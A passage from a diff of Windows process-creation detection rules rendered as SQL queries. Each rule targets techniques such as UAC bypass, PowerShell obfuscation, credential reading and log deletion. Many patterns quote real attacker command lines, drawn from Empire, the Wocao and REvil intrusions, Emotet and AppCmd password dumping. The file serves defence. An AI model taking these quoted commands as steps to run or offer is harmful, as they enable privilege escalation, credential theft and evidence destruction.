LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" - ], - 
"filename": "proc_creation_win_powershell_download_dll.yml" - }, - { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", "attack.defense_evasion", - "attack.t1036.004", "attack.t1027", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR NewProcessName LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((NewProcessName LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR NewProcessName LIKE 
'%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. 
before log collection agent installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "A General detection for sdclt being spawned as an elevated process. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Psr.exe Capture Screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", "status": "test", - "description": "Detects Netsh command execution that whitelists a 
program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' 
OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' 
ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_findstr_recon_everyone.yml" }, { - "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "title": "Control Panel Items", 
+ "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1547.001" + "attack.t1546" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": "d4498716-1d52-438f-8084-4a603157d131", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects a when net.exe is called with 
a password in the command line", - "author": "Tim Shelton (HAWK.IO)", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" - }, - { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Recon Information for Export with Command Prompt", - 
"id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1119" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tree.com' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\doskey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_recon.yml" + "filename": "proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN 
OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Audio Capture via PowerShell", + "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "status": "test", - "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", - "author": "Sreeman, Florian Roth", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE 